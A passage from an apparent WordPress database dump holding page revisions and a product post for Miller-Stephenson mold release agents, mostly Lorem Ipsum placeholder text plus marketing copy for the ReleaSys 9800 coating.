interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n[product_lookbook cat="mold-release-agents" products="8"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:42:03', '2017-05-30 14:42:03', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4326, 3, '2017-05-30 16:21:24', '2017-05-30 16:21:24', '<h2>ReleaSys 9800™ Mold Release Coating</h2>\r\n<h3>Advanced Chemistry for Advanced Materials</h3>\r\nReleaSys 9800 mold release coating delivery sophisticated technology to today;s modern molding industries with an alternative to the traditional “shop-spray” or high volume, apply-every-cycle release agent. Miller-Stephenson has been at the forefront in developing the most effective products of this type and transitioning industries to these formulations for their molding processes as appropriate. We have focused on taking the message to our customers that "more is not necessarily better" when it comes to applying mold release agents. Today’s highly sophisticated water-based semi-permanent mold release coating technologies do more with less.  Our ReleaSys 9800 delivers the following benefits:\r\n<ul>\r\n 	<li>Excels at de-molding advanced composites and aggressive substrates</li>\r\n 	<li>Ideal for highly-polished; complex mold</li>\r\n 	<li>Tenacious adhesion to all molding surface</li>\r\n 	<li>Extended re-application intervals</li>\r\n 	<li>Rapid Cure; no heat required</li>\r\n 	<li>Minimal build-up and mold fouling</li>\r\n 	<li>Eco-friendly Water-based formulation</li>\r\n</ul>\r\nOur unique chemistry provides a mold release which exceeds the rigorous demands of manufacturing today\'s advanced composites and substrates. This proprietary chemistry comes in an eco-friendly, no VOC formulation and requires no extended cure times.  ReleaSys 9800 mold release coating forms an immediate, tenacious bond to the mold surface upon drying.  ReleaSys 9800 provides a simple, yet sophisticated mold release chemistry, designed for all high performance composites used in compression molding, resin transfer, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. etc. This robust formulation excels equally well with other forms of molding and materials, and can be used to release more typical substrate such as polyurethane, thermoplastics, rubber/elastomers, and fiberglass. The advanced chemistry within ReleaSys 9800 holds tremendous utility and applicators will see the immediate effects.\r\n<ul>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n 	<li>Decreased cost of scrap and waste.</li>\r\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\r\n 	<li>Ability to restore and extend the life of your equipment</li>\r\n 	<li>Improved mold integrity, surface quality and throughput</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n</ul>\r\n<h3>Providing Molding Expertise and Innovative Chemistry for over 50 years</h3>\r\nMiller-Stephenson experts have spent years focusing on how to improve composite molding operations by increasing efficiency, reducing waste and enhancing finished part quality. We have formulated several specialty mold release agents for just that purpose. As a leader in the development of water-based products, Miller-Stephenson ReleaSys product line offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products.\r\n\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ 9800 | Mold Release Coating', 'ReleaSys™ 9800 is a high-performance, high cross-linking water-based, semi-permanent mold release system. This formulation forms our most robust and durable coating, offering unmatched adhesion to all molding surfaces. ReleaSys 9800 provides highly sophisticated, advanced chemistry in a simple, one-coat water-based system which does not require time-consuming mold sealers or primers. Our coating acts as a sealer and release agent in a single step, maximizing protection of your mold surface and increasing product throughput. Benefits include:\r\n<ul>\r\n 	<li>Tenacious surface adhesion and durability</li>\r\n 	<li>Rapid Cure; No heating required</li>\r\n 	<li>Ideal for Advanced Composites and Aggressive substrates</li>\r\n 	<li>No transfer; Flat-Satin finish</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'mold-release-coating', '', '', '2017-05-31 12:03:23', '2017-05-31 12:03:23', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4326', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4327, 2, '2017-05-30 14:42:53', '2017-05-30 14:42:53', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n[product_lookbook cat="semi-permanent-release-agents" products="8"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:42:53', '2017-05-30 14:42:53', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4328, 2, '2017-05-30 14:43:42', '2017-05-30 14:43:42', '<h4 style="text-align: left;"><strong>Advanced Composites Mold Release</strong></h4>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style="text-align: left;"></p>', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:43:42', '2017-05-30 14:43:42', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4329, 2, '2017-05-30 14:58:24', '2017-05-30 14:58:24', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="171" height="171" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" 